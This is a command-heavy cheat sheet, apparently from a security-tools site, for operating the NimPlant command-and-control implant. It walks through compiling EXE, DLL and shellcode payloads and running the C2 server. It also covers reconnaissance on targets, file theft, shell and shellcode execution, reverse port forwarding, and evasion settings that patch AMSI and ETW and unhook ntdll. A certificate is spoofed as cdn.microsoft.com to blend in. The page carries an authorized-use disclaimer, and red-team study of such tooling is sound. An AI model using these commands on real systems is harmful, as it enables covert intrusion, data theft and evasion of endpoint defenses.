Pular para o conteúdo
1337skills 1337skills - Folhas de Dicas

NimPlant

NimPlant é um implante de comando e controle (C2) leve e multiplataforma escrito em Nim. Apresenta comunicação HTTP/HTTPS, intervalos de sleep configuráveis, operações de arquivo e capacidades de execução de shellcode.

DISCLAIMER: This tool is intended for authorized security testing and red team engagements only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical. Always obtain written authorization before conducting any offensive security operations.

Instalação

Server Setup

# Clone the repository
git clone https://github.com/chvancooten/NimPlant.git
cd NimPlant

# Install Python dependencies for the server
pip install -r server/requirements.txt

# Install Nim (required for compiling implants)
# On Linux
curl https://nim-lang.org/choosenim/init.sh -sSf | sh

# Install Nim dependencies
nimble install -y winim nimcrypto zippy

Compile the Implant

# Edit configuration before compiling
nano config.toml
# config.toml - NimPlant configuration
[server]
ip = "0.0.0.0"
port = 443
registerPath = "/api/register"
taskPath = "/api/task"
resultPath = "/api/result"

[implant]
sleepTime = 10
sleepJitter = 20
killDate = "2026-12-31"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Compile the implant (Windows EXE)
python3 NimPlant.py compile -o exe

# Compile as DLL
python3 NimPlant.py compile -o dll

# Compile as shellcode (via sRDI)
python3 NimPlant.py compile -o shellcode

# Cross-compile for Windows from Linux
python3 NimPlant.py compile -o exe --crosscompile

Server Operations

Starting the Server

# Start the NimPlant C2 server
python3 NimPlant.py server

# Server starts listening on configured port
# Web UI available at https://server-ip:port/

Managing Implants

# In the NimPlant server console:

# List active implants
nimplant> list

# Interact with a specific implant
nimplant> interact <implant-id>

# View implant details
nimplant> info

# Kill an implant
nimplant> kill

Comandos

Reconnaissance

# Get system information
nimplant> whoami
nimplant> hostname
nimplant> ipconfig
nimplant> env

# List running processes
nimplant> ps

# Get current working directory
nimplant> pwd

# List directory contents
nimplant> ls C:\Users

File Operations

# Upload a file to the target
nimplant> upload /local/path/file.exe C:\Windows\Temp\file.exe

# Download a file from the target
nimplant> download C:\Users\target\Documents\secrets.txt

# Read a file
nimplant> cat C:\Users\target\Desktop\notes.txt

# Create a directory
nimplant> mkdir C:\Windows\Temp\workdir

# Remove a file
nimplant> rm C:\Windows\Temp\file.exe

# Copy a file
nimplant> cp C:\source\file.txt C:\dest\file.txt

# Move a file
nimplant> mv C:\old\file.txt C:\new\file.txt

Execution

# Execute a shell command
nimplant> shell net user

# Execute a command via cmd.exe
nimplant> cmd /c dir C:\

# Run PowerShell command
nimplant> powershell Get-Process

# Execute assembly in memory (inline-execute)
nimplant> inline-execute /path/to/assembly.exe arg1 arg2

# Execute shellcode
nimplant> shinject <pid> /path/to/shellcode.bin

Network Operations

# List network connections
nimplant> netstat

# Reverse port forward
nimplant> rportfwd 8080 127.0.0.1 80

# Stop reverse port forward
nimplant> rportfwd stop 8080

Sleep and Communication

# Change sleep interval (seconds)
nimplant> sleep 30

# Change sleep jitter (percentage)
nimplant> jitter 40

# Combination: sleep 30 seconds with 40% jitter
nimplant> sleep 30
nimplant> jitter 40

HTTPS Communication

# Generate self-signed certificate for HTTPS
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt \
  -days 365 -nodes -subj "/CN=cdn.microsoft.com"

# Place certificates in the server directory
cp server.key server/
cp server.crt server/

OPSEC Considerations

# NimPlant OPSEC features:
# - Encrypted C2 communications (AES-256)
# - Configurable sleep with jitter to avoid beacon detection
# - Kill date to auto-terminate after engagement
# - User-agent customization to blend with normal traffic
# - Direct syscalls to avoid API hooking (optional)

# Recommended practices:
# 1. Use legitimate-looking domain with valid HTTPS certificate
# 2. Set appropriate sleep times (30-60s for stealth)
# 3. Use redirectors between implant and C2 server
# 4. Set a kill date matching the engagement window
# 5. Rotate implant binaries to avoid signature detection

Evasion Configuração

# Additional config.toml evasion options
[implant]
sleepTime = 60
sleepJitter = 30
killDate = "2026-06-30"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

[evasion]
patchAmsi = true
patchEtw = true
unhookNtdll = true

Logging

# Server logs all interactions
# Logs stored in: server/logs/

# View engagement log
cat server/logs/nimplant.log

# Each implant session has its own log
ls server/logs/sessions/

Cleanup

# Terminate all active implants
nimplant> killall

# Individual implant cleanup
nimplant> interact <id>
nimplant> kill

# Remove artifacts from target (via shell before killing)
nimplant> shell del C:\path\to\implant.exe
nimplant> kill